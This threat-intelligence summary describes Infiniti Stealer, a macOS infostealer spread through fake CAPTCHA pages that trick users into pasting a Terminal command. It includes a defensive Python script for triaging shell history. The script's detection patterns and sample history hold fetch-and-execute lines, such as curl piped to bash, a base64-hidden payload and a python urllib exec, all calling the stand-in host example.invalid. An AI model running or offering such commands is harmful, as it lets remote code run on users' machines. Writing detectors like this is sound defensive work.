
Infiniti Stealer Malware Distributed via Fake CAPTCHA Pages on macOS

Severity: Medium (Score: 57.0)

Sources: Cybersecuritynews, Bleepingcomputer, Scworld, Gbhackers, Securityaffairs.Co

Summary

Infiniti Stealer, a newly identified macOS infostealer, is being distributed through fraudulent Cloudflare-style CAPTCHA pages. The pages use the social-engineering technique known as ClickFix: the fake "verification" step instructs the visitor to copy a command and run it in Terminal, and that pasted command is what installs the stealer. No software vulnerability is exploited; the attack depends entirely on the user executing the command, which is why no CVE is associated with it and why patching alone does not mitigate it. The malware was initially tracked as 'NukeChain' before its true identity was revealed when its operator panel became publicly accessible. The campaign appears widespread and its operational status remains active. Security teams should treat any instruction to paste a command into Terminal as part of a CAPTCHA or "fix" step as an indicator of compromise.

Key Points:

  • Infiniti Stealer is distributed via fake Cloudflare CAPTCHA pages targeting macOS users.
  • The malware relies on ClickFix social engineering to get the victim to execute the installation command themselves.
  • No CVE is associated with this malware because the attack vector is the user, not a software flaw; vulnerability scanning will not surface it.
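The practical detection problem for a ClickFix campaign is that the victim's own shell runs the payload, so the evidence is a pasted command in shell history or process telemetry rather than an exploit. The following is an added example written for this summary (not code from the cited sources, and not derived from the malware's operator panel) that triages shell-history lines for the command shapes a fake-CAPTCHA "verification step" typically asks for: a remote script piped into a shell (T1059.004), a base64 blob decoded into a shell, a Python one-liner that fetches code (T1059.006), an inline osascript, and removal of the quarantine attribute. The indicator patterns, the sample history and the domain example.invalid are constructed assumptions; the actual lure command used by Infiniti Stealer is not quoted on this page.

```python
"""Triage shell-history lines for ClickFix-style paste-and-run commands.

Added example for this threat summary; not code from the page's sources or
from the malware's operator panel. The indicator patterns, sample history and
the domain example.invalid are constructed assumptions; the real Infiniti
Stealer lure command is not quoted on this page.
"""
from __future__ import annotations

import base64
import re

# Generic ClickFix indicators (assumed, see module docstring). Each pattern
# describes a shape of command a fake CAPTCHA "verification step" asks the
# victim to paste into Terminal.app, mapped to an ATT&CK technique.
INDICATORS = {
    # T1059.004: remote script piped straight into a shell interpreter
    "remote_script_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # T1059.004: obfuscated payload decoded and piped into a shell
    "base64_decoded_to_shell": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # T1059.006: python one-liner that fetches and executes remote code
    "python_inline_fetch": re.compile(
        r"\bpython3?\s+-c\s+.*\b(urllib|requests|socket)\b"),
    # T1059: AppleScript one-liner, commonly used for fake password prompts
    "osascript_inline": re.compile(r"\bosascript\s+-e\b"),
    # Gatekeeper bypass: stripping the quarantine attribute from a download
    "quarantine_strip": re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
}
HIGH_CONFIDENCE = {"remote_script_to_shell", "base64_decoded_to_shell",
                   "python_inline_fetch"}
_B64_ECHO = re.compile(
    r"\becho\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(-d|-D|--decode)\b")


def classify(cmd: str) -> list[str]:
    """Return the sorted names of every indicator the command matches."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def reveal_base64(cmd: str) -> str | None:
    """If the command echoes a base64 blob into base64 -d, return the decoded text."""
    m = _B64_ECHO.search(cmd)
    if not m:
        return None
    try:
        # validate=True rejects stray characters instead of silently skipping them
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage(history: list[str]) -> list[dict]:
    """Flag history lines matching at least one indicator.

    A decoded base64 payload is classified again, so an obfuscated
    'curl ... | bash' still surfaces as remote_script_to_shell.
    """
    hits = []
    for lineno, cmd in enumerate(history, start=1):
        tags = classify(cmd)
        if not tags:
            continue
        decoded = reveal_base64(cmd)
        decoded_tags = classify(decoded) if decoded else []
        severity = ("high" if HIGH_CONFIDENCE & set(tags + decoded_tags)
                    else "medium")
        hits.append({"lineno": lineno, "command": cmd, "tags": tags,
                     "decoded": decoded, "decoded_tags": decoded_tags,
                     "severity": severity})
    return hits


# Constructed sample of a ~/.zsh_history; not captured from a real victim.
_PAYLOAD = base64.b64encode(b"curl -s https://example.invalid/p.sh | bash").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git pull origin main",
    "curl -fsSL https://example.invalid/verify.sh | bash",
    f"echo {_PAYLOAD} | base64 -d | sh",
    "python3 -c \"import urllib.request;exec(urllib.request.urlopen("
    "'https://example.invalid/x').read())\"",
    "brew update",
    "xattr -d com.apple.quarantine ~/Downloads/Update.app",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_HISTORY):
        print(f"[{hit['severity']:6}] line {hit['lineno']}: {hit['command']}")
        print(f"         tags={hit['tags']} decoded={hit['decoded']!r}")
```

Run against a collected `~/.zsh_history` or `~/.bash_history` (or against the command lines from EDR process telemetry) to surface paste-and-run activity; because the decoded payload is re-classified, the severity of an obfuscated line reflects what it actually executes rather than its outer shape. The patterns are deliberately broad, so expect benign hits from developers who install tooling with `curl | sh`; the value is in correlating a hit with a preceding browser visit to an unexpected CAPTCHA page.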

Key Entities

  • Silver Fox (apt_group)
  • Malware (attack_type)
  • Phishing (attack_type)
  • Financial (industry)
  • Infiniti Stealer (malware)
  • NukeChain (malware)
  • T1059.004 - Unix Shell (mitre_attack)
  • T1059.006 - Python (mitre_attack)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • T1567.002 - Exfiltration to Cloud Storage (mitre_attack)
  • MacOS (platform)
  • Windows (platform)
  • Any.run (platform)
  • VirtualBox (platform)
  • Hybrid Analysis (tool)
  • Joe Sandbox (tool)
  • VMware (tool)